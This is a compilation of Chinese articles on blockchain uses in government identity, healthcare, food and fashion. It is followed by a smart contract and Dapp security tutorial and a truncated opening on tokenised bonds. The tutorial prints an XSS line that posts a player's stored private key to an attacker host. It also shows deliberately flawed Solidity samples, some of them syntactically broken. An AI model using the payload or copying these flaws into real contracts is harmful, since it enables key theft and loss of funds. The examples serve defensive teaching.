区块链告诉你如何证明“我就是我”

“一门式”政务服务改革解决了证明“你妈是你妈”的问题,现在轮到你要解决你自己的问题。当没有护照或者身份证时,你怎么能够证明“我就是我”?一种基于区块链(Block chain)技术的智慧多功能身份认证平台,可以解决这个问题。
区块链技术作为一种新兴底层IT技术,率先在银行、保险、证券等金融领域得到广泛应用,如今逐渐扩展到社会治理领域。在广东省佛山市,禅城区率先在全国范围内将区块链技术运用到政务服务中,并打造出全国首个区块链政务应用创新平台,推动“放管服”改革向深度发展。

1.简政放权从“1”到“0”

区块链,一种按时间顺序将数据块以顺序相连的方式组合成链式数据结构,并以密码学方式保证历史数据不可篡改和不可伪造的系统。专家介绍,这一技术具有分布式、可追溯、不可篡改、非对称加密、自维护等特性。其中,高安全性是其最大优势,信息没有人可以擅自更改,对于持有者而言具有十分稳定的安全保障性。
如今,这项互联网技术让佛山禅城区的居民享受到了政务服务“零跑腿”。禅城区行政服务中心主任丘少锋对《瞭望》新闻周刊记者表示,办事群众通过基于区块链技术的“IMI身份认证平台”验证了“我就是我”后,即可在移动终端完成基本信息的录入和表格的填写,并将办事申报材料提交到一门式系统,完成事项的申办,从而实现了办事群众足不出户即享受高效、便捷的政务服务。
“目前,首批具有代表性的共20个行政服务事项被纳入区块链政务服务,涵盖证件办理、证明出具、资格认证、小额津贴发放等四种必须本人现场确认身份的服务事项。从试点开始,再慢慢进行全面推广,并逐步增加可办理的事项。”丘少锋告诉《瞭望》新闻周刊记者。
2014年3月,禅城区按照“马上就办、办就办好”和“让数据多跑路,让群众少跑路”的要求,以信息化技术为手段,率先在全国探索开展“一门式”政务服务改革,持续推进简政放权、放管结合和优化服务。
自运营以来至今年6月底,累计办事量达到495万件,实现零投诉、零差错,群众满意度达99.95%。而基于区块链技术的“智信禅城”的出现,推动一门式向“零跑腿”服务发展。
不久前,基于区块链技术的支撑,禅城区发布了云务通、盘古健康平台、养老助残信息化平台等一系列民生应用成果,市民可享受一系列便捷服务。
例如,“云务通”大数据互联网智能IT运营系统与基于区块链技术开发的IMI身份认证平台相结合,实现真实身份认证、远程授权开门、轨迹审计、视频查控等。通过汇聚基于LBS的人口基础信息、居住信息、出入信息、消费信息、社会化服务信息等,真正实现非户籍人口数据采集自动化,社会管理精细化,社会服务精准化,为推动智信城市建设提供了有力的技术保障。
又如,佛山市民网借助区块链技术提供的认证服务,通过“IMI身份认证平台”扫描码登录,即可取得市民网的实名认证服务权限,为市民提供社保个人账单推送及查询、公积金查询、交通违章查询、水电燃气费查询、预约挂号、网上办事、实名政民互动等服务,享受新技术带来的方便和快捷。
同时,禅城区正致力打造区块链+大数据综合应用平台,目前已在电信、商圈、交通等多个领域进行尝试。
“区块链不仅仅是一项技术,更代表着一种方法论和一种理念。”佛山市禅城区委书记刘东豪说。“一门式”改革是通过信息技术如串联、并联、跳转等方式实现信息共享,行政审批由原来的多个门、多个口、多个人精简到“1”。“但要实现由‘1’最后精简到‘0’,则需要行政思维的颠覆性创新。”

2.证明“我是我”不再是难题

接受《瞭望》新闻周刊采访的专家认为,简政放权要实现由1到0,需要满足两个前提条件:一是数据的真实性,即要确认“我是我”;二是数据的安全性。而这两大难题刚好被区块链技术解决了。
“区块链最重要的是解决了中介信用问题。”刘东豪说,在过去,两个互不认识不信任的人要达成协作是难的,必须要依靠第三方。
比如支付行为,必须要有银行或者支付宝这样的机构存在。但是通过区块链技术,比特币使人类第一次实现在没有任何中介机构参与的情况下,完成双方可以互信的转账行为。“这是区块链技术的重大突破。”刘东豪说。
这项能够证明“我是我”的技术突破即IMI(Intelligent Multifunctional Identity),是依托于区块链底层技术、基于可信数据空间构建的真实的自然人和法人信息的智慧多功能身份认证平台。
平台以实名认证为基础,将身份控制权从中心服务器移交给个人,利用区块链安全、可溯源、不可篡改、不可抵赖的技术特点,有效解决虚拟世界人员真实身份的确认问题。个人拥有对信用身份的控制权,而且身份可以由权威部门如政府进行认证。这样线下的真实的个人就可以和互联网上的一个身份产生强关联,进而在互联网上证明“我是我”。
借助这一技术,禅城区将该身份认证平台对接“一门式”的自然人库和部门业务系统数据,提供政务事项自助办理和申请表单自助填写服务,实现安全、可靠、可信的自助办理。
“‘一门式’解决了证明‘你妈是你妈’的问题,现在轮到你要解决你自己的问题。当没有护照、身份证的时候,你怎么证明你自己?”刘东豪说。
据介绍,一个物体、一个事件、一个人,从出生到死亡的全过程,可以用数字真实记录,并且具有唯一性。而通过时间、地点、方式多维的角度,用不同的数字去表述和确认这种唯一性是能做到的。也就是说,“我就是我”可以用数字表述出来。
“区块链依靠其安全、可溯源、不可篡改、不可抵赖的特点,全面解决了网上或者自助办理事务时办事人员的真实身份确认问题,实现了用IMI就如同本人亲自办事的效果。”广东省大数据管理局标准与应用处处长熊雄认为,为建设服务型、责任型、法治型和廉洁型政府提供了一条路径。

3.一台“创造信任的机器”

在区块链技术的支撑下,禅城区正式向社会推出“智信城市”计划。“智信城市”是在城市数据化、社会互联化、信用感知化的基础上,由智慧城市进化升级而来,为数字时代下的信用社会赋予全新内涵。
“区块链正在重构社会经济发展形态,将有效地提升政府治理和公共服务水平。”中央网信办信息化发展局局长徐愈对《瞭望》新闻周刊记者表示,作为一种安全、可靠的信息传递模式,区块链在电子政务领域的应用也引起了各国的普遍关注。
比如,区块链可以帮助确认公民身份,省去办事过程中复杂的身份确认过程;在发放政策补贴和政府福利中,可以帮助政府减少冒领和欺诈;在市场监管中可以有效提高税收征管、产权管理的效率和准确性。同时,其信息透明和不可整改的特性,可以使决策变得更加透明、慎重和科学。
当前,数字经济正在深刻改变人们的生产和生活方式,逐渐成为经济增长的新动能和促进产业转型升级、推进政府治理现代化的重要引擎。其中,区块链技术作为新兴底层IT技术发挥着关键支撑作用,成为近年来国际组织、各国政府以及产业界研究的热点,势必会引发新一轮技术创新和产业变革。
“佛山将紧紧把握这一重大机遇,抓住区块链技术在产业转型升级、政府服务改革、民生社会事业等领域的创新应用,加快建设宜居宜业宜创新的高品质、现代化、国际化大城市。”佛山市市长朱伟说。
国家“十三五”信息化规划第一次将区块链和人工智能、大数据等内容上升为国家级战略。“从去年开始,国内有不少省市陆续发布了自己的区块链发展白皮书,但真正落地投入开发的并不多。佛山禅城区是国内第一个将区块链技术在政务和民生领域实现大规模推广应用的行政区域。”光载无限集团副总裁曲明告诉《瞭望》新闻周刊记者。
曲明介绍,禅城区将分三期完成区块链应用的布局。第一期已建成自然人IMI身份认证平台,并基于区块链技术打造了一个生态平台,连接禅城“一门式”政务服务平台以及综合治理云平台,并完成对其他业务的支持。第二期将建设面向法人的身份认证平台,介入更为广泛的金融服务、交易服务等社会主要商业应用。第三期将建立全新以场景为驱动的多维度立体信用体系。
“先对万物确权,然后再联通万物作为可信的身份,构建一个基于信用的全新生态圈。”曲明说,“现在我们在朋友圈晒各种吃喝玩乐,希望有一天能够变成晒信用,让信用变得可以分享。”
受访专家认为,尽管区块链技术的应用前景十分光明,但也不能指望其“包治百病”。例如,区块链主要解决的是身份认证与信用问题,对于本质上是权力划分与归属问题的“信息孤岛”问题,起不到根治效果。但专家也认为,区块链技术通过数据的确权确实有助于打通“信息孤岛”。
“区块链技术犹如一台‘创造信任的机器’,有助于政府社会治理能力的提高和社会信用体系的建设,有助于打造一个成本最低、效率最高、摩擦最小的社会秩序。”刘东豪认为。

区块链+医疗的探索:我国首个区块链技术慢病管理平台上线

最近在长沙召开的2018心脑血管协同创新健康联盟成果推广会上,我国首个具自主知识产权的“区域慢病智能管理与药品配送平台”正式上线。未来,药物将有望送货到家。据悉,该平台的建设,还首次引入了区块链技术,使处方流转及药物配送具可追溯性,最终确保相关医疗数据和运营的安全。

伴随着人口老龄化进程,心脑血管疾病已成为我国最主要的慢病之一。与此同时,我国还存在着心脑血管疾病人群的低知晓率、低治疗率、低控制率等“三低”现况。为提高治疗率和控制率,解决高血压等慢病患者长期复诊和购药不便等问题,国家与地方联合工程实验室、中南大学、浙江大学现代中药研究所等八单位,共同打造了“区域慢病智能化管理与药品配送平台”。

通过该平台,高血压等慢病患者可通过手机App实现线上复诊和处方药物配送请求。即使对智能手机使用不熟练的患者,也可使用药店的一体机设备在线问诊。而在获得医师开具的电子处方,和通过药剂师审方后,即可确定药物配送方案,患者可到药店取药,或选择线上支付后获药物配送到家的服务。此外,平台还具有复诊、药物需求等提醒功能。

该平台作为我国首个拥有自主知识产权核心技术的区域慢病管理平台,通过信息技术打造了“医+药”的生态闭环,有效对接了国家互联网+医疗、分级诊疗、家庭医生签约政策,既解决了基层服务能力不足的问题,也提高了患者的药物治疗依从性,能大大降低慢病治疗费用。

区块链与医疗的结合,符合技术需要支撑纯数字信息技术之外的其他复杂应用场景落地的趋势,电子医疗数据的处理是当前区块链热点研究的领域之一。然而医疗数据共享的痛点主要在于患者敏感信息的隐私保护与多方机构对数据的安全共享。区块链作为一种多方维护、全量备份、信息安全的分布式记账技术,为医疗数据共享带来的创新思路将是一个很好的突破点。区块链无中心服务器的特性使得系统不会出现单点失效的情况,很好的维护系统稳定性。如下图所示,区块链在医疗领域的应用场景可以有以下四个方面,可以实现多方在区块链平台上对数据进行共享,满足获取患者历史数据、将共享数据用于建模和图像检索、辅助医生治疗和健康咨询等。

图  医疗数据区块链共享平台

1. 隐私保护层面:传输的医疗数据经过加密处理,安全地存储在区块中,难以篡改。所有的用户真实信息都是匿名的,难以追溯数据源头。还有在存储的数据形式和内容方面,可以根据数据共享类型的需要进行改变。例如对于图像类型的数据,可以将图像的特征作为加密的数据进行存储。

2. 访问控制层面:去中心化的点对点传输需要解决信任机制问题。医疗保险流程复杂、结算难、各个医疗机构之间存在访问壁垒、信息不流通的问题都可以通过区块链平台来解决。

患者在不同医疗机构之间的历史就医记录都可以上传到共享平台上,不同的数据提供者可以授权平台上的用户在其允许的渠道上对数据进行公开访问,例如第三方医疗机构就可以通过医院共享的患者数据对特定类型的疾病进行建模分析,从而达到更好的辅助决策和治疗的目的,或者利用大量的患者数据来研制新药。现有的区块链上的访问控制机制可以采用智能合约或者一些非对称加密算法来实现。利用智能合约的流程自动化,既降低了成本也解决了信任问题。

随着区块链技术的日益普及和发展,给医疗领域将带来显而易见的革新,医疗机构、制药厂、保险公司、社区、设备厂家、政府等都可以从中获利,医疗健康的数据可以更为安全、快捷地方式进行全网共享,更好的助力智慧医疗的发展。

例如,贵阳朗玛信息技术股份有限公司实践了适用于慢病管理场景的区块链技术:通过共识算法、智能合约,在统一网络中进行数据共享和管理。监管机构、医疗机构、第三方服务提供公司及患者本人均能够在一个受保护的生态中共享敏感信息,协同落实一体化慢病干预机制,确保疾病得到有效控制。朗玛信息帮助用户特有的身份信息创建独有的数字身份及相应的公私密钥,协助用户对个人数据授权进行管理,不同机构(包括朗玛信息慢病管理机构)所搜集的用户数据将打包加密存储至各自的节点中,而各节点的身份管理池机制将确保用户身份数据的合法写入、不同用户帐号体系间的互联互通及数据关联建立,包括身份管理、权限证明、授权管理等。所有参与机构在明确有调阅非本机构产生的用户数据需求时,经用户授权许可之后,通过密钥比对可获取用户相关实时的医疗健康信息,确保了用户的隐私安全,避免了传统医疗数据共享所带来的法律及伦理挑战。而监管机构无需再一一比对数据即可实时获取可信数据,掌握居民慢病管理整体状况,大大提升了监管效率。通过区块链技术,该项目提供了全新的分级诊疗就医体验,在保证用户隐私基础上,实现了慢病管理的全程共享、全程协同、全程干预。

药品溯源也是区块链在医疗领域的主要落地方向。例如,上海三链信息科技有限公司开发了基于区块链技术的医药溯源应用,主要落地在医药的溯源、追溯查询和医药溯源数据交易方面,解决了供应链上下游之间的信息不透明不对称以及企业间信息共享的难题。一方面,联盟链上存储的数据在获得各节点授权后,可针对医药供应链全链条数据进行统计分析,辅助计划策略的制定,简化采购流程,降低库存水平,优化物流运输网络规划,提供商品销售预测;另一方面,医药溯源数据交易市场构建了大数据交易平台,提供溯源数据交易流程和定价策略,促进各企业主体依据自己的安全和隐私要求对联盟内外的数据需求进行响应并完成交易。

区块链具有分布式、不可篡改、可追溯等特性,在实体经济的改造中已经开始了广泛的探索并取得初步成效,目前已开始在以医疗为代表的实体经济的很多领域实现落地应用,区块链在实体经济产业场景中落地的模式和逻辑也日益清晰,相信未来会有更多的应用赋能实体经济以造福社会。

区块链赋能餐饮业

「民以食为天」,餐饮业是传统行业,但许多餐饮从业者已拥抱区块链。区块链赋能餐饮业的应用场景大致分三类:数字货币消费、食材溯源、餐厅积分。

比特币跟餐饮非常有渊源。比特币第一次有价格在2010年5月22日。美国佛罗里达州程序员拉斯洛.汗耶兹(Laszlo Hanyecz)用10000枚比特币换了两份披萨,这两份披萨当时售价41美元,比特币自此第一次被赋予了价格,即1比特币0.0041美元。因此,每年的5月22日被区块链的信仰者称为「披萨节」。

后来的八年多来,比特币、以太坊等数字货币的价格波动大、每秒处理的转帐数量有限,并不适用于餐饮的小额支付场景。但是一些餐饮从业者希望藉此作为噱头,吸引更多的年轻客人。2014年1月,拉斯维加斯两家赌场接受比特币为餐饮结帐;2017年6月,莫斯科一家俄式餐厅发布新闻公告称,该餐厅成了俄罗斯境内首个可以用比特币付款的餐饮服务场所,今年世界杯期间俄罗斯多家餐厅接受比特币支付;2018年初,全美最大连锁餐饮集团Tilman Fertitta的CEO表示,将开放旗下的雨林咖啡馆和莫顿的牛排餐厅接受比特币支付;今年,肯德基在加拿大推出了用比特币可以购买的套餐「比特币桶」,包括10块原味鸡翅、华夫饼、一份鸡块、土豆泥及两份薯条,售价0.0010305个比特币;日本作为比特币大国,其多家餐厅也很早接受比特币、以太坊支付。

区块链的可追溯、不可篡改等特性使其成为原产地食材溯源的工具。阿里、京东、IBM和沃尔玛等巨头,都在布局区块链食品溯源。食链FOODC也专注于该领域,主要关注相对高端的、生产环节比较複杂的食物,以养殖业为主,比如鱼肉、羊肉、黑猪肉等,希望将牧场养殖、屠宰、物流、经销商、大批发商、超市/餐厅等环节全部打通,将每个环节的信息上链,用户可以看到相对应环节的信息,包括什麽时候养殖、用什麽饲料;物流环节的具体保存温度、运输路线;真实包装日期(之后没法修改);经销商名称等信息。

杜绝「假奶粉事件」再现

Morganchain(摩根链)也在做类似事情,从「地理戳」、「时间戳」、「品质戳」三个不同的技术范围进行数据採集,然后存储到底层链上,发布了一款地理标志农产品(即GI食材)区块链溯源成果:中国五常地区的纯胚芽米溯源。瑞士SFF(Stop Fake Food停止虚假食材)区块链项目则更进一步,将激光食药品检测硬件设备与区块链溯源相结合,现已应用于欧洲橄榄油等检测上。其创始人告知笔者,该项目如果在全世界普及,中国的假奶粉事件、欧洲的马肉置换牛肉事件等食品安全悲剧就不会再发生。

餐厅积分方面,北京南站吉野家店曾于2018年3月推出点餐送狗狗币(DOGE),每点一餐送一枚。其实,这是重庆速佔位科技有限公司开发的智能点餐系统「速位点餐」的推广活动,只要在速位app点餐就会获得狗狗币的奖励,吉野家只不过是作为速位app的合作推广方而已。在香港,「饮食天王」梁震宇发布了「天王链KOC」项目,依託于已进行十二年的「饮食天王颁奖典礼」,集结合作商家太兴、许留山、兰桂坊、翠华、大家乐等数十个品牌,使消费者对平台上的商家进行点评分享,获得通证奖励,形成良性循环。项目方旨在藉此打造去中心化的美团点评,令餐饮从业者、平台和消费者获得多赢。

笔者认为,不论是数字货币消费、食材溯源,还是餐厅积分,目前都处于初级状态,现在评价项目的成熟、成功与否为时尚早。餐饮业属于toC(面向个人消费者)的行业,业界竞争充分,极少形成寡头,消费者消费高频、选择众多,以上特性与区块链在去中心化、可溯源、匿名性等特性契合,二者结合或将有光明的前景,成就独角兽企业。

2018年医疗区块链五大事件盘点

2018年医疗区块链从早期技术发展,概念验证和试点项目一路走来取得了快速发展。

Deloitte在今夏的报告中预测,分布式账本技术(DLT)的突破时刻即将来临,因为近75%的研究受访者认为分布式账本技术的商业案例令人信服。

对区块链技术有“刚需”的医疗行业而言,技术供应商正在采用区块链并不奇怪,以下是2018年医疗区块链领域五个重要事件和里程碑:

沃尔玛公布了医疗区块链专利。零售业巨头沃尔玛申请保护一种通过DLT获取EHR数据的方法,该专利最初于2016年12月14日提交,于2018年公布。虽然具体细节还有待观察当然,但早期的报告显示该专利涉及包括RFID扫描仪及可穿戴设备,使紧急救援人员能够访问无意识患者的医疗数据。

Change Healthcare推出企业医疗区块链技术。医疗技术提供商Change在其智能医疗网络中集成了开源区块链工具Hyper Ledger Fabric 1.0,以提高透明度和效率,从而提高医疗服务的审计,可追溯性和信任度。今年晚些时候,Change还将其区块链技术应用于亚马逊网络服务云 ,使用户能够跟踪保险索赔提交和汇款。

亚马逊开发出医疗区块链行业模板。亚马逊宣布推出区块链行业模板,第一个版本中包括金融和医疗保健行业模板,亚马逊为用户预先设置了以太网和Hyperledger Fabric的框架,以便技术人员更容易使用开源技术创建区块链行业项目和网络。

疾病预防控制中心(CDC)邀请IBM和英特尔参与区块链试点以对抗阿片类药物流行病。疾病控制和预防中心正在对分布式账本DLT进行多项测试,并正与公共卫生机构建立健康监测系统,以便对医生进行有关其患者处方实践的调查,目前CDC正在与英特尔和其他机构合作开展项目部署医疗区块链,以更有效地追踪药物的分布和从点到点的运输。

Gartner告诫医疗机构不要错失区块链机会。Gartner表示,医院和其他忽视区块链的组织正面临落后的风险,因为他们的竞争对手已经开始积极部署区块链来获取竞争优势。Gartner还指出,区块链将引发医疗行业的一次深层次的变革,表现为医院业务流程和模型的去中心化。

推荐阅读:

区块链在医疗健康行业的潜在应用

比食品溯源更靠谱:区块链如何改变时尚业?

Bcamp点评:食品溯源区块链的致命短板是源头信息真伪难以把控,但是这个短板在时尚业完全不是问题,因为奢侈品和时尚产品厂商有足够的能力和意愿,确保源头信息的真实上链。

在时尚界,往往新设计新产品到达零售商终端之前,市场上就已经开始出现假冒复制品。去年假冒服装配饰产品给厂商造成的损失超过450亿美元,这还不包括品牌受损的损失。

这个问题的讨论最早可以追溯到2017年5月在哥本哈根举行的时装峰会。在那里,基于区块链的应用程序Provenance成为人们关注的焦点。它的目标是记录时尚产品创作的完整历史信息。

首先,有关布料的信息已上载到应用程序。然后将关于缝制衣服和所有相关过程的数据添加到区块链网络中。因此,可以追踪Martine Jarlgaard连衣裙的整个生命周期。

在完全上传创建过程之后,将一件衣服附加到数字令牌上,通过该令牌可查看每件的数字历史。客户也可以通过标签上的QR码获取该信息。

这项技术如今被中国公司BitSE使用,它开发了类似的基于以太坊的应用程序VeChain。荷兰创业公司Seal也开发了一款类似的应用程序,通过智能手机提供有关商品真实性的信息。

简述智能合约及Dapp安全

智能合约和dapp的开发属于新的范式,开发的方式与以前会有所不同。 “敏捷开发”的格言在这个新范式中好像不起任何作用了,这类项目的开发会有一定的风险,这要求我们采用缓慢而有条理的方法来开发我们的应用程序,在设计和编码时尽量谨慎和考虑周全。 开发时也不能让自己承受过多的压力,比如制定严格的期限等。

如果把大多数传统的apps类比于社区诊所,那么区块链可以说是急诊室。有些很小的问题,一旦上链的话,就会变的很难解决,你必须考虑到所有可能的负面结果,如果没有这么做,你可能会面临非常可怕的后果。所以在我开始具体的内容之前,我必须要重申一下区块链开发方面的特点,这些迫使我们开发时要非常小心。

所有代码都是公开的

以下几个原因导致了一些的问题。

首先,区块链的代码是开源的,任何人都可以看到你写的代码,所以很明显,智能合约中不应记录敏感的个人信息。不然,你就可以进行用户的链上行为分析,但这对于小白用户来说可能听起来不太好,因为他的历史行为暴露在了全世界面前。

这就导致智能合约及其相关存储功能只能存储合同正常运行所必需的信息。

其次,最最重要的是,所有源代码都公开可见,这意味着在地下工作的明星黑客有充足的时间和自由,来梳理你的每一行代码,寻找其中的漏洞,代码将无处可藏。

Gas 限制

我相信大多数人都知道,以太坊的是有Gas费的,Gas费些许的昂贵,并且还有一定的限制!如果智能合约中的逻辑可以导致大量Gas消耗,则会出现严重的问题。循环调用是这种情况的常见原因。

最后也是最重要的一点是:

不可篡改特性

智能合约代码都是完全根据最初的逻辑执行,并禁止The DAO级别的硬分叉。对区块链来说,合约一旦部署,一切都将不可篡改。

不可篡改的有点是让我们可以高枕无忧的相信智能合约。我们首次将信任编程到代码中。陌生人之间可以信任代码,而不是彼此建立信任。我们慢慢的开始相信智能合约,它不会骗人,也不会在任何时候做出格的事情。

对我来说,我会以非常开放的心态拥抱全球的区块链霸主。并且作为工程师,我也会努力去实现这个信任社会。

但是这个信任社会有些致命问题,设想一下,如果我们家的技术文盲奶奶不小心把她的google搜索痔疮膏的信息发布到了Facebook上,这不会是大问题,可以删掉。但如果她在某个有漏洞的智能合约上暴露了自己的私钥,那我们就无能为力了,她精通技术的侄子也没有任何办法,区块链浏览器中历史记录将无法删除!

在写代码的时候,我们必须假设每个用户都是技术文盲,并百分百地确保函数的正确调用,执行能够操作无误,你永远都不会知道,有多少人盯着你钱包地址上的数百万美金。

接下来我将介绍一些准备好的漏洞示例,并且进行一些练习,让每个人都参与进来。以便我们在今后在写代码时能够避免Dapp和智能合约的漏洞。

实际案例推荐

我们来看第一个案例,让我们从一些背景开始。

这是一个去中心化的游戏平台

  • 它的应用程序都是基于浏览器的
  • 游戏开发者可以公开发布他们的游戏(在以太坊网络上运行的dapps)
  • 玩家可以注册dapp并从选择各种游戏(用ETH购买虚拟商品)。
  • 注册时会帮你创建新的钱包(这个案例不需要Mist 或Metamask)
  • 钱包密钥存储在玩家的浏览器中,用于验证和支付。

是的,这似乎是开发人员通过平台进行发布,并有效连接玩家的好地方。

不幸的是,有一款叫HODL QUEST的游戏在发布后,用户下载它时,他们钱包中的以太币数量就开始减少。

玩家的以太币去哪了呢?让我们先来看一下平台的一些情况:

l这个问题是几小时前发布的新游戏HODL QUEST引起的

l首次打开游戏后,钱包的资金几秒钟就消失了

l在游戏注册期间,开发人员在平台内的表单中输入dapp的名称,智能合约地址和URL

l该平台将游戏iframe嵌入到dapp中,同时在页面顶部显示游戏名称

你可以开始看看它的发展方向……经过进一步的检查,我们发现HODL QUEST游戏的开发者在注册过程中为游戏标题注入了一个内联脚本。所以仔细观察游戏html代码,我们发现了这样的事情:

<h1>HODL <script>$.post(‘https://haxxx.lol/’, localStore.getItem(‘privateKey’));</script> QUEST</h1>

The player’s browser ends up evaluating the javascript snippet inserted at the game title and sending the player’s private keys to attacker remote servers.

用户的浏览器插入了游戏标题的javascript片段,并将用户的私钥发到给攻击者远程服务器上。

这只是我们写Dapp时可能出现的众多问题之一,以下我列举的,在构建项目时要记住的事项清单:

  • 保护钱包和私钥:如果用户的钱包受到损害,那就game over了,所以处理这些敏感信息时需要特别小心。
  • 保护用户信息:用户不希望他们的个人数据暴露在世界各地,开发时要确保用户数据不被泄露。
  • 明智地评估需要存储在区块链或服务器中的内容,只能包含智能合约运行所必需的数据
  • 使用HTTPS:这是标准做法,应该是显而易见的
  • .gitignore敏感文件:保护自己免于意外泄露漏洞的另一种方法
  • 不要在代码中插入访问/ API密钥
  • 在dapp中执行关键/风险操作时要进行双重认证:在区块链上采取的操作是不可变的,因此链下的安全验证非常重要

DAPP的安全性与智能合约的安全性一样重要,希望广大开发者始终牢记在心。

智能合约竞争条件

什么是竞争条件?竞争条件是电子设备,软件或其他系统中的输出取决于其他不可控事件的顺序或时间一种行为。当事件没有按程序员的意图发生时,它就变成了一个bug。这是以太坊智能合约中许多漏洞的根源

一个关于race condition 愚蠢的例子

在以太坊智能合约中出现竞争条件的方式有几种。在这篇文章中,我们将关注两种常见情况。重入和交易顺序依赖。

重入

如果计算机程序可以在执行过程中被中断,则可以在其先前的调用完成执行之前安全地再次调用(“重新输入”),这被称为可重入计算机程序。在对其他合同进行外部调用时,这可能会显示在智能合约中,因为它们可能会在原始调用完成之前回调到原始函数。你可能会问,这怎么可能?

输入fallback 函数,这些函数是在将Ether发送到合约时调用的功能,而不提供要调用的函数名称。

在这个例子中,当withdraw函数使用address.call.value()方法发送ether时,它会触发BankRobber的fal’lback函数,然后可以再次调用withdraw方法。正如您所看到的,这将导致智能合同一次又一次地发送以太可能会耗尽所有以太币!

我们怎么能防止这种情况?有几种不同的方式。第一个依赖于我们对发送,转移和呼叫之间差异的理解。

从上图中可以看出,有许多不同的方式可以发送以太币,但大多数情况下,都推荐使用address.transfer。这是因为如果交易耗尽所有的2300 gas,就会回滚这样,如果恶意合同试图重新签订合同,gas将用完,整个交易将被还原。

在某些情况下,使用发送或回调是有意义的,但在使用这些时需要格外小心,因为只有在发送以太币感到非常满意时,才会出现这种情况。99%的时候,转移是正确的路径。

防止重入的另一种方法是在进行外部调用之前更新状态并在合同中执行检查,以确保状态代表即将执行的事务。

打包头部交易(交易顺序依赖)

另一种情况是竞争条件依赖,让恶意的交易被优先打包,这是区块链的开源性质决定的。如果在智能合约中运行竞价或类似机制,黑客可能会通过操纵gas价格,矿工打包交易时会在交易池中选择价格高的进行打包。在这段时间内,其他恶意行为者可以监控并发送恶意交易,来破坏已经发送的出价交易。矿工则会对区块中的交易价格进行重新排序,这就造成恶意交易被优先打包。

有几种不同的方法可以防止像这样的操纵。一个是把交易批量打包,另一个方法是披露投标人发送其出价的哈希值,在确认之前识别是不是恶意交易。

让我们来看看另一个例子

这个智能合约是一个游戏,用户可以将以太币送到只能合约中成为新的国王。当一个新人成为国王时,老国王就会收到只能合约中的以太币。你能找到这个漏洞吗?

这是Ethernaut的一个很好的例子,它开展了探索智能合约安全的练习。您可以在此处查看有关此漏洞的更详细说明。

这些示例表明,在进行外部调用时,绝不应该假设您调用的智能合约是可信的。始终注意防止攻击者可能尝试的所有可能的负面结果。

fallback函数

fallback函数很有用,因为它们包含在将Ether发送到您的合同时调用的代码。但他们无法处理一切。

首先,当从fallback函数触发时,回退功能只能访问2,300 gas,因此逻辑需要非常简单,以免发生gas错误。

// example of a fallback function when
// you don’t want Ether to be sent to a contract
function () payable {
revert()
}

有一个问题!当以太币被强制发送到合约时,后备功能不会触发

contract ForceSend() {

function ForceSend() {

// sends ETH to victim without triggering the fallback function
function destroy() {
selfdestruct(victim);
}
}

函数将智能合约的以太币发送到受害者地址。此发送不会触发合同中的回退功能。接收免费以太是很好的,但正因为如此,你需要避免直接检查合同的余额并期望它是一个特定值,因为它实际上可能比你想象的更大!

整数运算

与大多数现代架构不同,EVM不处理浮点数或算术运算。所有数字存储和算术都用整数处理。这是什么意思?这意味着您的合同中没有任何意义,您可以将任何内容存储为小数或执行通常会返回小数的操作,例如查找百分比等。让我们看一个例子。

想象一下,您正在创建一个代币销售智能合约,根据销售过去的时间为买家提供奖励购买。它可能看起来像这样。

/// snippet from contract code
function calculatePrice() returns (uint256) {
uint percentTimePassed = (now – startTime)/(endTime – startTime);

uint price = (1-percentTimePassed)*basePrice + basePrice;

return price;

}

正如您所看到的,用传统语言,通过的时间百分比将计算为0到1之间的小数,然后返回价格。

不幸的是,这不适用于整数运算。如果操作操作不正确,可能某些不正确的百分比会导致严重问题的情况。

在Solidity中,你必须做这样的事情:

/// snippet from contract code
function calculatePrice() returns (uint256) {
uint percentTimePassed = 100*(now – startTime)/(endTime – startTime);

uint price = ((1-percentTimePassed)*basePrice)/100 + basePrice;

return price;

}

百分比计算为0到100之间的整数,应用于基本价格,然后除以100以将“小数位”固定到正确的点。这是计算百分比的一种粗略方式,因为它牺牲了一些精度,但是根据EVM的运行方式是必要的。您可以通过乘以100的较大倍数来获得更好的精度,但这是一个取决于合同背景的决定。

整数溢出/下溢

根据维基百科,当算术运算尝试创建一个数值超出可以用给定位数表示的范围 – 大于最大值或低于最小可表示值时,就会发生整数溢出。大多数语言都有解决此问题的方法,但Solidity无法自行处理溢出检查。这导致过去在区块链上出现一些智能合约的问题,但有很多方法可以解决这个问题。以下是使用Solidity添加的示例:

function add(uint a, uint b) {
res = a + b
if (res-b == a) && (res>b || res==b)  {
// the operation was safe
} else {
// overflow
}
}

这通过确保结果没有包围变量所保持的最大值来检查加法运算的溢出。减法,乘法和除法需要类似的检查。

漏洞 3

你能找到智能合约中的错误吗?

uint[] public bonusCodes;

function pushBonusCode(uint code) onlyOwner {
bonusCodes.push(code);
}
function popBonusCode() onlyOwner {
require(bonusCodes.length >= 0);
bonusCodes.length–;
}
function modifyBonusCode(uint index, uint update) onlyOwner {
require(index < bonusCodes.length);
bonusCodes[index] = update;
}

此契约具有一个存储数组,其长度字段可以递减到0.这会导致算术下溢,从而有效地禁用Solidity的数组边界检查。因此,在溢出写入数组之后可以用来覆盖位于数组之后的任何存储元素 – 包括所有映射!

在开发的时候,我们并不能确定,有哪些没有考虑到的微小的点,单这些可能是导致归零的重大问题,在文中举的案例中,就导致用户平均损失了数百万美元。

我们所能做的最好的事情就是遵循所有现有的应用程序和智能合约范式,并且要要进行广泛测试,以及要让专业的安全人员帮我们审核代码。

未来,让我们一起共建智能合约的功能和安全性!

区块链上的现金流-可编程债券(三步曲)

别人经常问我证券型通证的哪些方面最令人兴奋,而我总用一句话来回答:“我们现在还没有涉足的方面”。我倾向于把证券型通证视为创造新一代证券的推手,而这些证券在现实世界是不存在的。从这个角度来看,我对打造一种新形式的加密证券更感兴趣,而不是只是对传统证券做一个数字化的包装。作为一个实用主义者,我清楚的知道,要搭建一套完善的基础设施还需数年的时间,但是仍有一些实际的案例可以加速这方面的发展。在这些案例中,我认为通证化的债务或现金流为释放证券型通证的潜力提供了多种可能性。

现存的这一代证券型通证集中于创建某种基础权益(股权)的载体。尽管在技术上很简单,通证化的股权仍然是一个非常局限的工具,我们缺乏给其他资产类别提供流动性和二级市场的基础设施。金融市场的历史告诉我们,流动性和落地应用是通过短期活动和交易建立的,并不是长期投资。在此种背景下,我们需要一种易于理解的,对于普通投资者来说用户友好的,还能提供明显的短期利益的证券型通证,才能为生态系统提供推动力。债券有潜力成为将证券型通证引入主流投资者视野的那把钥匙。

通证化债务的独特优势

